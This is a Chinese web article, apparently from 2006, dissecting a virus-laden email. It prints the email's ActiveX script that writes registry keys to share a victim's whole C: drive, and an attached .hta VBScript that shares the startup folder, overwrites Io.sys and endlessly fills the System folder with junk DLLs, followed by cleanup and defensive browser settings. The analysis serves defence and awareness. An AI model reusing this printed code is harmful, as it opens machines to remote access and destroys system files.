分享
 
 
 

不明邮件是如何共享你的硬盘的

王朝other·作者佚名  2006-12-16
窄屏简体版  字體: |||超大  

function f()//改写注册表的函数

{

var aa,ss;

aa=document.applets[0];

aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

aa.createInstance();

ss=aa.GetObject();

ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network

\\LanMan\\C$\\Flags",302,"REG_DWORD");

ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network

\\LanMan\\C$\\Type",0,"REG_DWORD");

ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network

\\LanMan\\C$\\Path","C:\\");

}

function init()

{

setTimeout("f()", 1000);//每过1000毫秒就再次递归调用f()

}

init();//调用函数

〈/script〉

〈/BODY〉〈/HTML〉



这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan中添加了一个键值C$,并且将C盘改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件……并且可以给你上传木马,永久而全面地控制你的机器。



再来看一看附件Laugh.hta吧。我查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件,就将它导出为Txt文件——哈哈!全看到了!



〈html〉

〈script language=vbs〉

On Error Resume Next·容错语句,避免程序崩溃

set aa=CreateObject("WScript.Shell")·建立WScript对象

Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系统对象

Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径

Set dir2 = fs.GetSpecialFolder(1)·得到System路径

dir1=dir1+"\START MENU\PROGRAMS\启动" aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetworkLanMan\S$\Flags",302,"REG_DWORD"·写入Dword值Flags,这是共享类型的标志

aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetworkLanMan\S$\Type",0,"REG_DWORD"·写入Dword值Type

aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetworkLanMan\S$\Path",dir1·写入共享资源的绝对路径

a=10

Set Os = CreateObject("Scriptlet.TypeLib")·建立自定义枚举对象

doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How about have dinner with me together?”"

·一堆垃圾码,以备写入目标文件

Os.Reset·重置TypeLib对象

Os.Path = "C:\Io.sys"·TypeLib对象的目标路径为C:\Io.sys

Os.Doc = doc·写入的内容——就是上面的一堆垃圾

Os.Write()·写入!

while true

·死循环,垃圾文件越多越好

a=a+1

Os.Reset

Os.Path = dir2&"\Msvbvm"&a&".dll"

·目标路径为System下的Msvbvm???.dll文件

Os.Doc = doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&

doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&d

oc&doc&doc&doc&doc&doc&doc&doc&doc&doc

·大量重复,以生成足够大小的文件

Os.Write()·生成文件!

wend

〈/script〉

〈/Html〉



没想到hta文件的权限比Html的权限还大一些,竟然可以调用FileSystemObject元件(文件系统对象)。病毒首先得到你的Windows目录和System目录,再修改注册表,把你的启动目录——"C:\WINDOWS\Start Menu\Programs\启动"设置为完全共享,这样就可以被黑客搜到,上传一个“冰河”或者“广外女生”,你就掉的大了,而且你还被蒙在鼓里!大家一般哪里会去查看启动目录啊!你好毒!你好毒!你好毒毒毒毒…… 然后病毒就把目标对准System目录,往里面灌垃圾文件,都是形如Msvbvm???的Dll文件,而且所有VB编写的程序都不能用了,提示找不到Dll文件——因为Msvbvm50.dll和Msvbvm60.dll被垃圾文件覆盖了。



我马上查看了一下Windows目录,竟然有648M之大,垃圾文件成山!难怪启动那么慢。只有查找Msvbvm*.dll,全部删除之(不知有没有误删的)。 然后删除带毒邮件(注意:一定要在后面步骤之先删掉带毒邮件),再将共享的目录改回来,最后把Io.sys再次覆盖一遍,OK!



防备方法:将ActiveX元件、Java脚本和Vbs脚本等全部禁止就可以避免Bingo。



具体方法是:在Internet Explorer菜单中点击“工具”——“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX控件以及Java和Vbs脚本相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些善意使用脚本和控件的网站无法正常浏览。嗯……当然最好是安装Norton AntiVirus,它会提醒你有不明超文本或程序写你的注册表和磁盘,而且使用比较简单(非常适合好友这种菜鸟)。另外还有Lockdown2000 Professional(注意:不是普通版,是专业版)也不错,是我看过的最为复杂,最为强大的个人防火墙,不过它的资源占用率比Norton高得多。孰优孰劣,你自己看着办喽!

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有